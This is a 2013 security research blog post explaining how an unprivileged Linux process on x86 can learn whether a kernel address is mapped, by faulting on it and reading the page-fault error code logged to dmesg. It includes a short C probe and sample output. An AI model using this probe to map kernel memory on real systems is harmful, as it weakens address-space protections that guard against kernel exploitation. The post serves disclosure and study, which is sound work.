It's Bugs All the Way Down

Security Research by Dan Rosenberg

A Linux Memory Trick

I discovered a neat little trick on Linux: on x86 (and a few other less common architectures), it’s possible to determine from an unprivileged process whether an address residing within the kernel address space is mapped or unmapped.

The top-level page fault handler on x86 is do_page_fault(), found in arch/x86/mm/fault.c. When the CPU fires a page fault exception, it pushes an error code onto the stack, which is accessible as an argument to the page fault handler.

When a userland process attempts to access unmapped memory or memory whose page permissions do not allow the desired type of access, the following code path is invoked:

do_page_fault()
__do_page_fault()
bad_area_nosemaphore()
__bad_area_nosemaphore()
show_signal_msg()

This last function prints a message to the kernel syslog with information about the uncaught SIGSEGV that is thrown as a result of the invalid memory access:

static inline void
show_signal_msg(struct pt_regs *regs, unsigned long error_code,
        unsigned long address, struct task_struct *tsk)
{
    if (!unhandled_signal(tsk, SIGSEGV))
        return;
        
    if (!printk_ratelimit())
        return;
        
    printk("%s%s[%d]: segfault at %lx ip %p sp %p error %lx",
        task_pid_nr(tsk) > 1 ? KERN_INFO : KERN_EMERG,
        tsk->comm, task_pid_nr(tsk), address,
        (void *)regs->ip, (void *)regs->sp, error_code);
    
    print_vma_addr(KERN_CONT " in ", regs->ip);

    printk(KERN_CONT "\n");
}

Note that the error_code printed to the syslog has been passed down all the way from the top-level page fault handler. It’s worth taking a look at what the bits of this error code correspond to. Most importantly, bit 0 is the Present flag, indicating whether or not the page the process was trying to access is present at all. Bit 1 is the Read/Write flag, indicating whether this was a read or write fault, and bit 2 is the User/Supervisor flag, which is 0 when the fault was caused by a supervisory process, and 1 if the fault was caused by a user process.

In other words, regardless of whether the attempted access resides in user or kernel space, the error code logged to the syslog indicates whether the address corresponds to a present or absent page. This can be verified as follows:

$ cat trick.c
#include <stdlib.h>

int main(int argc, char **argv)
{
    int *ptr, foo;
    ptr = (int *)strtoul(argv[1], NULL, 16);
    foo = *ptr;
}

$ ./trick ffffffff81aa3690
Segmentation fault (core dumped)
$ ./trick ffffffffc1aa3690
Segmentation fault (core dumped)
$ dmesg | grep segfault
[391396.756467] trick[31865]: segfault at ffffffff81aa3690 ip 0000000000400528 sp 00007fff7c026ba0 error 5 in trick[400000+1000]
[391404.736606] trick[31872]: segfault at ffffffffc1aa3690 ip 0000000000400528 sp 00007fff170fac60 error 4 in trick[400000+1000]

The first invocation deliberately causes an access violation on a mapped kernel address, resulting in an error code of 5 (a read violation from user mode on a present page). The second invocation causes an access violation on an unmapped kernel address, resulting in an error code of 4 (a read violation from user mode on a non-present page).

This trick is only possible if you can read the syslog in the first place, so the dmesg_restrict sysctl must be disabled.

This entry was posted on Wednesday, February 6th, 2013 at 6:23 pm and is filed under Kernel, Linux. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.